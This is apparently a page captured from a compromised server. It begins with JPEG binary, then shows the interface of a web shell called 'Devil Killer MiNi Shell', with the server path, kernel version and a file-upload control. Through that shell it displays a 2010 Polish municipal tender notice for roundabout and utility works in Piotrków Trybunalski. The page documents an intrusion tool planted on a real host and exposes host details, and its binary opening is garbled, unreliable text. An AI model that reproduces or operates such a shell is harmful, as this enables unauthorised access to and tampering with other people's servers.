JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20100712/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20100712/204020-N-2010.html

<p class="kh_header"><b>Piotrków Trybunalski: Wykonanie ronda u zbiegu ulic: Wolborska, Wierzejska, Wyzwolenia, Rzemieślnicza 
w ramach zadania pn. Poprawa bezpieczeństwa ruchu drogowego w ciągu drogi krajowej nr 91 w Piotrkowie Tryb., poprzez:
a)	Budowę ronda u zbiegu ulic: Wolborska, Wierzejska, Wyzwolenia, Rzemieślnicza,
b)	Rozbudowę skrzyżowania ulic: Krakowskie Przedmieście, Żeromskiego, Przedborska, Śląska.</b><br>
<b>Numer ogłoszenia: 204020 - 2010; data zamieszczenia: 12.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Piotrków Trybunalski , ul. Pasaż Rudowskiego 10, 97-300 Piotrków Trybunalski, woj. łódzkie, tel. 044 7327796, faks 044 7327798.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.piotrkow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie ronda u zbiegu ulic: Wolborska, Wierzejska, Wyzwolenia, Rzemieślnicza 
w ramach zadania pn. Poprawa bezpieczeństwa ruchu drogowego w ciągu drogi krajowej nr 91 w Piotrkowie Tryb., poprzez:
a)	Budowę ronda u zbiegu ulic: Wolborska, Wierzejska, Wyzwolenia, Rzemieślnicza,
b)	Rozbudowę skrzyżowania ulic: Krakowskie Przedmieście, Żeromskiego, Przedborska, Śląska..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres rzeczowy  obejmuje:
Rozbudowę skrzyżowania obejmuje odcinek ulicy Wolborskiej od skrzyżowania z ulicą Litewską do skrzyżowania z ulicą Geodezyjną oraz odcinki ulic Wierzejskiej, Wyzwolenia oraz Rzemieślniczej w bezpośrednim sąsiedztwie skrzyżowania i polegać będzie na budowie ronda z przyległymi do niego chodnikami, budowie kanalizacji deszczowej, rozbudowie istniejącego oświetlenia ulicznego, przebudowie zjazdów i ogrodzeń. Zakres zadania ujmuje też przebudowę kolidujących z inwestycją odcinków podziemnej linii energoelektrycznej SN i NN, podziemnej linii teletechnicznej, sieci gazowniczej, napowietrznej linii energoelektrycznej oraz sieci wodociągowej z przyłączami.
	
I.	Roboty drogowe:

1.	Jezdnia bitumiczna o nawierzchni z SMA	1 888 m2
2.	Krawężniki betonowe 20 x 30 cm na ławie beton.	              384 m
3.	Krawężniki betonowe 15 x 30 cm na ławie beton.	                37 m
4.	Krawężniki betonowe trapezowe  na ławie beton.	    88 m
5.	Krawężniki granitowe groszkowane 20 x 30 cm na płask na ławie beton.	   69 m
6.	Krawężniki granitowe groszkowane 20 x 30 cm stojące na ławie beton.	  48 m
7.	Pierścień ronda z kostki kamiennej regularnej 13x16 cm	 222 m2
8.	Chodniki z kostki betonowej kolorowej 	  82 m2
9.	Chodniki z kostki betonowej bezfazowej szarej 	         1 000 m2
10.	Chodniki z kostki betonowej szarej 	132 m2
11.	Obrzeża betonowe 30 x 8cm	            338 [m]
12.	Krzewy ozdobne	            290 szt.

II.	Roboty instalacyjne:

a)	Przebudowa istniejących sieci gazowych:

1.	Roboty rozbiórkowe nawierzchni i chodników wraz z wywozem gruzu, odtworzenia nawierzchni	1 	kpl
2.	Wykopy i roboty ziemne, pełna wymiana gruntu, zagęszczenie zgodnie z PT, wywóz ziemi na teren Wykonawcy	1 	kpl
3.	Rurociągi z rur PE100 SDR11  gaz  fi 40 - 3,7mm , na podsypce i obsypce piaskowej wraz z niezbędnymi kształtkami, przejściami, oznakowaniem, armaturą, próbami	1,44	mb
4.	Rurociągi z rur PE 100 SDR 17,6 gaz  Fi 110 - 6,3 mm, na podsypce i obsypce piaskowej wraz z niezbędnymi kształtkami, przejściami, oznakowaniem, armaturą, próbami	6,81	mb
5.	Rurociągi z rur PE 100 SDR 17,6 gaz  Fi 160 - 9,1 mm, na podsypce i obsypce piaskowej wraz z niezbędnymi kształtkami, przejściami, oznakowaniem, armaturą, próbami	97,77	mb
6.	Rurociągi z rur PE 100 SDR 17,6 gaz  Fi 225 - 12,8 mm, na podsypce i obsypce piaskowej wraz z niezbędnymi kształtkami, przejściami, oznakowaniem, armaturą, próbami	62,82	mb
7.	Podłączenie do istniejącej sieci gazowej		

b)	Kanalizacja deszczowa wraz z przyłączami

1.	Roboty rozbiórkowe nawierzchni i chodników wraz z wywozem gruzu, odtworzenia nawierzchni	1	kpl
2.	Wykopy i roboty ziemne, pełna wymiana gruntu, zagęszczenie zgodnie z PT, wywóz ziemi na teren Wykonawcy	1	kpl
3.	Kanały z rur WIPRO kl.III 400mm, na podsypce i obsypce piaskowej, z zabezpieczeniem antykorozyjnym, wraz z niezbędnymi kształtkami, przejściami	402,41	mb
4.	Kanały z rur PVC SN8  200 - 5,9mm (przykanaliki do wpustów), na podsypce i obsypce piaskowej, wraz z niezbędnymi kształtkami, przejściami	125,57	mb
5.	Kanały z rur PVC SN8 250 - 7,3mm, na podsypce i obsypce piaskowej, wraz z niezbędnymi kształtkami, przejściami	20,26	mb
6.	Kanały z rur PVC SN8  315 - 9,2mm, na podsypce i obsypce piaskowej, wraz z niezbędnymi kształtkami, przejściami	92,41	mb
7.	Wpusty uliczne betonowe 500, zwieńczenie kl.D400, z zabezpieczeniem antykorozyjnym, 	24	kpl
8.	Studnie żelbetowe DN1500, kineta prefabrykowana, połączenie kręgów na uszczelki, właz żeliwny z wypełnieniem betonowym z uszczelką wtopioną w korpus, osadzone szczelne przejścia	1	kpl
9.	Studnie żelbetowe DN1200, kineta prefabrykowana, połączenie kręgów na uszczelki, właz żeliwny z wypełnieniem betonowym z uszczelką wtopioną w korpus, osadzone szczelne przejścia	10	kpl
10.	Studnie żelbetowe DN1000, kineta prefabrykowana, połączenie kręgów na uszczelki, właz żeliwny z wypełnieniem betonowym z uszczelką wtopioną w korpus, osadzone szczelne przejścia	4	kpl

c)	Sieć wodociągowa,

1.	Roboty rozbiórkowe nawierzchni i chodników wraz z wywozem gruzu, odtworzenia nawierzchni	1	kpl
2.	Wykopy i roboty ziemne, pełna wymiana gruntu, zagęszczenie zgodnie z PT, wywóz ziemi na teren Wykonawcy	1	kpl
3.	Rurociągi z rur PE80 SDR11 Fi 40mm na podsypce i obsypce piaskowej wraz z niezbędnymi kształtkami, przejściami, oznakowaniem, armaturą, próbami	54,23	mb
4.	Rurociągi z rur PE80 SDR11 Fi 63mm na podsypce i obsypce piaskowej wraz z niezbędnymi kształtkami, przejściami, oznakowaniem, armaturą, próbami	67,55	mb
5.	Rurociągi z rur PE100 SDR11 Fi 90mm na podsypce i obsypce piaskowej wraz z niezbędnymi kształtkami, przejściami, oznakowaniem, armaturą, próbami	2,01	mb
6.	Rurociąg z rur żeliwnych sferoidalnych o śr. 80mm z wewnętrzną powłoką cementową, zewnętrzna powłoka glinowo - cynkowa zabezpieczona żywicą epoksydową, połączenia kielichowe, (węzły połączenia kołnierzowe ze śrubami ze stali nierdzewnej), bloki oporowe, na podsypce i obsypce piaskowej wraz z niezbędnymi kształtkami, przejściami, oznakowaniem, armaturą, próbami	8,17	mb
7.	Rurociąg z rur żeliwnych sferoidalnych o śr. 100mm z wewnętrzną powłoką cementową, zewnętrzna powłoka glinowo - cynkowa zabezpieczona żywicą epoksydową, połączenia kielichowe, (węzły połączenia kołnierzowe ze śrubami ze stali nierdzewnej), bloki oporowe, na podsypce i obsypce piaskowej wraz z niezbędnymi kształtkami, przejściami, oznakowaniem, armaturą, próbami	32,96	mb
8.	Rurociąg z rur żeliwnych sferoidalnych o śr. 150mm z wewnętrzną powłoką cementową, zewnętrzna powłoka glinowo - cynkowa zabezpieczona żywicą epoksydową, połączenia kielichowe, (węzły połączenia kołnierzowe ze śrubami ze stali nierdzewnej), bloki oporowe, na podsypce i obsypce piaskowej wraz z niezbędnymi kształtkami, przejściami, oznakowaniem, armaturą, próbami	139,86	mb
9.	Rurociąg z rur żeliwnych sferoidalnych o śr. 200mm z wewnętrzną powłoką cementową, zewnętrzna powłoka glinowo - cynkowa zabezpieczona żywicą epoksydową, połączenia kielichowe, (węzły połączenia kołnierzowe ze śrubami ze stali nierdzewnej), bloki oporowe, na podsypce i obsypce piaskowej wraz z niezbędnymi kształtkami, przejściami, oznakowaniem, armaturą, próbami	504,16	mb
10.	Hydranty pożarowe nadziemne z żeliwa sferoidalnego z podwójnym zamknięciem z uszczelnieniem trzpienia typu o-ring DN100 PN16 w komplecie z zasuwą, , odsadzką z żeliwa sferoidalnego, obudową i skrzynką odejściem rurą z żeliwa sferoidalnego	5	kpl
11.	Podłączenie do istniejącej sieci wodociągowej		
12.	Przepięcie istniejących przyłączy wodociągowych w pasie drogowym Fi40
	Fi63
	Fi90	12
4
20	mb
mb
mb

III.	Roboty elektryczne:

a)	Zakres prac teletechnicznych:
1.	Budowa kanalizacji 6-otworowej 94 m, 1-otworowej 81 m, przebudowa i budowa studni - 11 szt.
2.	Przebudowa kabli magistralnych i rozdzielczych - łącznie ok. 1430 m.
3.	Przebudowa kabli światłowodowych (przeniesienie kabli do projektowanej kanalizacji).
b)	Zakres prac elektroinstalacyjnych:
1.	Przebudowa kabli 15 kV - przełożenie kabla istniejącego i trzy wcinki do kabli istniejących łącznie ok. 270 m.
2.	Przebudowa linii napowietrznej 400 230V przez likwidację przęsła i postawienie dwóch słupów krańcowych, ułożenie kabli 120 mm 2  ok. 110m i 35 mm 2  765 m.
3.	Wymiana przyłączy napowietrznych z wymienianych dwóch słupów.
4.	Budowa oświetlenia ulicznego na linii napowietrznej i słupach stalowych - łącznie 5 punktów.
5.	Towarzyszące powyższemu, opisanemu w dokumentacji zakresowi prac demontaże.

Inwestor dopuszcza stosowanie innego typu osprzętu i wyposażenia niż w dokumentacji pod warunkiem zachowania tych samych danych technicznych i standardów jakościowych elementów wskazanych dokumentacją i przedmiarami. Oferta winna podać typy proponowanego osprzętu i wyposażenia jak powyżej.

Roboty towarzyszące (przygotowawcze, ziemne)

W wycenie należy uwzględnić również:
Roboty pomiarowe, cięcie nawierzchni, rozbiórkowe, wywóz gruzu na składowisko Wykonawcy,
Wykopy wąskoprzestrzenne o pionowych ścianach, w pełni umocnione,
Pełna wymiana gruntu pod terenami utwardzonymi - jezdnie, chodniki, zjazdy,
Odtworzenie nawierzchni, w tym nawierzchni gruntowych i bitumicznych, po wykonywanych pracach, jak również podczas używania ciężkiego sprzętu,
Zabezpieczenie istniejącego uzbrojenia rurami osłonowymi na trasie budowanych sieci,
Regulacja istniejącej armatury,
Oznakowanie wodociągu 
Oznakowanie ulic na czas budowy jak również wykonanie docelowego oznakowania ulic,
w wycenie przebudowy sieci wodociągowej i gazociągowej uwzględnić koszty związane z wykonaniem niezbędnych badań, prób, dezynfekcji itp.,
W wycenie kanalizacji deszczowej uwzględnić koszty związane z wykonaniem inspekcji kanałów i przykanalików kamerą wizyjną, (dokumentację załączyć do dokumentów odbiorowych) - koszt ułożenia kanałów wycenić wraz z ceną ich inspekcji.
W wycenie przebudowy sieci wodociągowej i gazowej uwzględnić koszty związane z wykonaniem niezbędnych badań, prób, dezynfekcji itp.;
Do wyceny robót instalacyjnych sanitarnych należy przyjąć materiały spełniające następujące właściwości:
a)	Kanalizacja: rury PVC klasy SN8  - rury i kształtki jednego producenta,
b)	Gazociąg: rur PE100 SDR11- rury i kształtki jednego producenta,
c)	Wodociąg:
a.	zasuwy z żeliwa sferoidalnego, kołnierzowe z miękkim uszczelnieniem klina, PN16,
b.	hydranty pożarowe nadziemne z żeliwa sferoidalnego z podwójnym zamknięciem z uszczelnieniem trzpienia typu o-ring PN16, z zabezpieczeniem w przypadku złamania,
c.	hydranty pożarowe nadziemne z żeliwa sferoidalnego z podwójnym zamknięciem z uszczelnieniem trzpienia typu o-ring PN16,
d.	rury z PE80, PE100, SDR11- rury i kształtki jednego producenta,
e.	rurociąg z rur żeliwnych sferoidalnych z wewnętrzną powłoką cementową, zewnętrzna powłoka glinowo - cynkowa (w stosunku 15%-85%) zabezpieczona żywicą epoksydową, połączenia kielichowe, - rury i kształtki jednego producenta,
f.	wszystkie połączenia kołnierzowe skręcane za pomocą śrub ze stali nierdzewnej,
d)	Wszystkie materiały muszą posiadać dopuszczenie do stosowania w budownictwie poświadczone, atesty higieniczne, a w przypadku rur żeliwnych Certyfikat Zgodności wydany przez niezależną akredytowaną instytucję potwierdzający zgodność wszystkich produktów z wszystkimi wymogami normy PN-EN 545. Certyfikat ten winien obejmować badania organizacji produkcji, etapy kontroli pośredniej, procesy produkcyjne, dokumentację i zapisy produkcyjne oraz końcowy produkt pod kątem wymagań normy PN-EN 545.

Przedmiotem zamówienia jest całość robót przewidzianych w ww. projekcie.

	W zakres przedmiotu zamówienia wchodzi także:
-	zapewnienie kompleksowej obsługi geodezyjnej inwestycji oraz wykonanie geodezyjnej inwentaryzacji powykonawczej przez uprawnionego geodetę, opracowanie dokumentacji powykonawczej w 4 egzemplarzach w każdej branży, na koszt własny,
-	uzyskanie koniecznych zezwoleń i uiszczenie opłat u zarządców dróg na zajęcie pasa drogowego na czas robót, kosztów obsługi przez Zakład Energetyczny,
-	właściwe oznakowanie dróg na czas budowy, zgodnie z zatwierdzonym projektem czasowej organizacji ruchu, zabezpieczenie wykopów przed dostępem osób trzecich, wykonanie przejść dla pieszych ,
-	dostarczenie, zainstalowanie i obsługa wszystkich tymczasowych urządzeń zabezpieczających takich jak: zapory, światła ostrzegawcze, sygnały, ogrodzenia, poręcze itp. niezbędne do ochrony robót, zapewniające bezpieczeństwo pojazdów i pieszych,
-	zapewnienie dojść do posesji,
-	odtworzenie nawierzchni dróg i wjazdów do stanu pierwotnego, a w przypadku, gdy projekt drogowy przewiduje inne niż dotychczasowe zagospodarowanie terenu - doprowadzenie do stanu projektowanego,
-	wykonanie koniecznych badań zagęszczenia gruntu celem odtworzenia i odbudowy nawierzchni drogowych zgodnie z Polską Normą: Drogi samochodowe. Roboty ziemne. Wymagania i badania PN-S-02205 Wskaźniki zagęszczenia gruntu oznaczyć zgodnie z normą BN-77 8931-12,
-	wykonawca odpowiada za ochronę instalacji na powierzchni ziemi i za urządzenia podziemne, takie jak rurociągi, kable itp. oraz uzyska od odpowiednich władz będących właścicielami tych urządzeń potwierdzenie informacji dostarczonych mu przez Zamawiającego w ramach planu ich lokalizacji. Wykonawca zapewni właściwe oznaczenie i  zabezpieczenie przed uszkodzeniem tych instalacji i urządzeń w czasie trwania budowy,
-	wykonawca zobowiązany jest umieścić w swoim harmonogramie rezerwę czasową dla wszelkiego rodzaju robót, które mają być wykonane w zakresie przełożenia instalacji i urządzeń podziemnych na terenie budowy i powiadomić inspektora nadzoru i władze lokalne o zamiarze rozpoczęcia robót. O fakcie przypadkowego uszkodzenia tych instalacji Wykonawca bezzwłocznie powiadomi inspektora nadzoru i zainteresowane władze oraz będzie z nimi współpracował dostarczając wszelkiej pomocy potrzebnej przy dokonywaniu napraw. Wykonawca będzie odpowiadać za wszelkie spowodowane przez jego działania uszkodzenia instalacji na powierzchni ziemi i urządzeń podziemnych wykazanych w dokumentach przekazanych mu przez Zamawiającego.
-	Wszystkie roboty ziemne na terenie objętym ochroną konserwatorską wykonywać pod ścisłym nadzorem archeologicznym. Inwestor ma obowiązek zapewnienia stałych nadzorów archeologicznych nad pracami ziemnymi związanymi z realizacją inwestycji, wykonywania prac ziemnych zgodnie z zaleceniami prowadzącego nadzór, w tym, w razie potrzeby, wykonywania tych prac metodami archeologicznymi.

UWAGA: Koszty zabezpieczenia terenu budowy wchodzą w zakres umowny i nie podlegają odrębnej zapłacie.

WYMAGANIA OGÓLNE WYKONANIA ROBÓT:

	Przed przystąpieniem do przetargu należy dokonać wizji lokalnej obiektu 
w miejscu realizacji zamówienia

UWAGA ! Zamówienie  należy  wykonać  ściśle  wg  projektu, oraz zgodnie ze Szczegółową Specyfikacją  Techniczną wykonania i odbioru robót

wszystkie materiały użyte do budowy muszą posiadać: 
Certyfikat na znak bezpieczeństwa wykazując, że zapewniono zgodność z kryteriami właściwych przepisów i dokumentów technicznych.
Deklarację zgodności lub certyfikat zgodności z: Polską Normą lub, Aprobatą techniczną w przypadku wyrobów, dla których nie ustanowiono Polskiej Normy, jeżeli nie są objęte certyfikacją.
Rozpoczęcie prac należy zgłosić do odpowiednich jednostek - gestorów sieci, celem poinformowania o ww robotach i czasie ich trwania.
Włączenie wodociągu do sieci miejskiej wykonać w uzgodnieniu z PWiK.
Włączenie gazociągu do sieci w uzgodnieniu z MSG Sp. z o.o.
podczas realizacji robót Wykonawca będzie przestrzegać przepisów dotyczących bezpieczeństwa i higieny pracy zgodnie z  rozporządzeniem Ministra Infrastruktury z dn. 6 lutego 2003 r. w sprawie bezpieczeństwa i higieny pracy podczas wykonywania robót budowlanych (Dz. U. z 2003 r. Nr 47, poz. poz.401)
warunkiem koniecznym dla prawidłowego przygotowania oferty przetargowej jest zapoznanie się z dokumentacją techniczną dotyczącą przedmiotowego zamówienia oraz Specyfikacjami Technicznymi Wykonania i Odbioru Robót..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.13.00-8, 45.23.21.30-2, 45.23.31.28-2, 45.31.61.10-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W niniejszym postępowaniu Zamawiający żąda wniesienia wadium.
1.	Wykonawca zobowiązany jest do wniesienia wadium do dnia 27.07.2010 r. do godz. 9:00 w wysokości 50 000 PLN. 
2.	Wadium może być wniesione w następujących formach:
a)	pieniądzu wpłaconym przelewem na rachunek bankowy BGŻ O Piotrków Tryb. Nr: 05203000451110000000261430 Uwaga: Na poleceniu przelewu należy zamieścić adnotację: Wadium - przetarg nieograniczony na: Wykonanie ronda u zbiegu ulic: Wolborska, Wierzejska, Wyzwolenia, Rzemieślnicza w ramach zadania pn. Poprawa bezpieczeństwa ruchu drogowego w ciągu drogi krajowej nr 91 w Piotrkowie Tryb., poprzez:
a)	Budowę ronda u zbiegu ulic: Wolborska, Wierzejska, Wyzwolenia, Rzemieślnicza,
b)	Rozbudowę skrzyżowania ulic: Krakowskie Przedmieście, Żeromskiego, Przedborska, Śląska .
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c)	gwarancjach bankowych,
d)	gwarancjach ubezpieczeniowych,
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. (DZ. U. z 2007r. Nr 42 poz. 275)           o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.
3.	Wadium należy wnieść przed upływem terminu składania ofert, przy czym wniesienie wadium w pieniądzu za pomocą przelewu bankowego Zamawiający będzie uważał za wniesione w terminie tylko wówczas, gdy bank prowadzący rachunek Zamawiającego potwierdzi, że środki zostały zaksięgowane na koncie Zamawiającego przed upływem terminu składania ofert.
4.	Oryginał poręczeń i gwarancji należy przekazać za pokwitowaniem do Referatu Zamówień Publicznych w Urzędzie Miasta, do pokoju nr 317 przed terminem składania ofert, a do oferty załączyć kserokopię. 
5.	Wykonawca, który nie wniesie wadium w wyznaczonym terminie zostanie wykluczony. Terminowe wniesienie wadium (w każdej z dopuszczonych form jego wniesienia) zamawiający sprawdzi w ramach własnych czynności proceduralnych.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Sposób dokonania oceny spełnienia wymaganych warunków:
przy dokonaniu oceny spełniania warunków zamawiający będzie się kierował regułą: spełnia albo nie spełnia,
niespełnienie chociażby jednego warunku skutkować będzie wykluczeniem wykonawcy z postępowania; ofertę wykonawcy wykluczonego uznaje się za odrzuconą.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>6.	Wykaz co najmniej trzech zamówień (wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert,  a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie) odpowiadających rodzajem przedmiotowi niniejszego zamówienia tj. budowy lub przebudowy drogi wraz z infrastrukturą towarzyszącą o wartości co najmniej 1 500 000,00 PLN każda (w tym roboty elektroenergetyczne na kwotę nie mniejszą niż 100 000,00 PLN). W celu potwierdzenia, iż prace zostały wykonane należycie należy dołączyć protokoły odbioru końcowego usług lub referencje - wg załącznika nr  4.
Sposób dokonania oceny spełnienia wymaganych warunków:
przy dokonaniu oceny spełniania warunków zamawiający będzie się kierował regułą: spełnia albo nie spełnia,
niespełnienie chociażby jednego warunku skutkować będzie wykluczeniem wykonawcy z postępowania; ofertę wykonawcy wykluczonego uznaje się za odrzuconą.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Sposób dokonania oceny spełnienia wymaganych warunków:
przy dokonaniu oceny spełniania warunków zamawiający będzie się kierował regułą: spełnia albo nie spełnia,
niespełnienie chociażby jednego warunku skutkować będzie wykluczeniem wykonawcy z postępowania; ofertę wykonawcy wykluczonego uznaje się za odrzuconą.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>7.	Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami - uprawnienia budowlane kierownika budowy w specjalności konstrukcyjno - budowlanej, oraz przynależność do Okręgowej Izby Inżynierów Budownictwa - wg załącznika nr 3. Sposób dokonania oceny spełnienia wymaganych warunków:
przy dokonaniu oceny spełniania warunków zamawiający będzie się kierował regułą: spełnia albo nie spełnia,
niespełnienie chociażby jednego warunku skutkować będzie wykluczeniem wykonawcy z postępowania; ofertę wykonawcy wykluczonego uznaje się za odrzuconą.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
